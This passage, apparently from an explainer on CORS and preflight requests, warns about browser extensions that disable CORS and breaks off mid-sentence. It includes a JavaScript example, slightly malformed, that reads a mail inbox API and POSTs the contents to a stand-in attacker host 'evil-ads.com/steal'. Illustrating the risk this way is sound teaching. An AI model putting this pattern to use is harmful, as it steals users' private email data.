For complex requests (e.g., those using methods other than GET/POST, or custom headers), the browser sends an OPTIONS request first (a "preflight" check). Some extensions struggle to intercept preflight requests properly. If the extension fails to inject headers during the preflight phase, the actual request will never be sent.

fetch('https://mail.company.com/api/inbox') .then(response => response.text()) .then(data => // Send your entire inbox to an attacker's server fetch('https://evil-ads.com/steal', method: 'POST', body: data ) );

Disabling CORS is :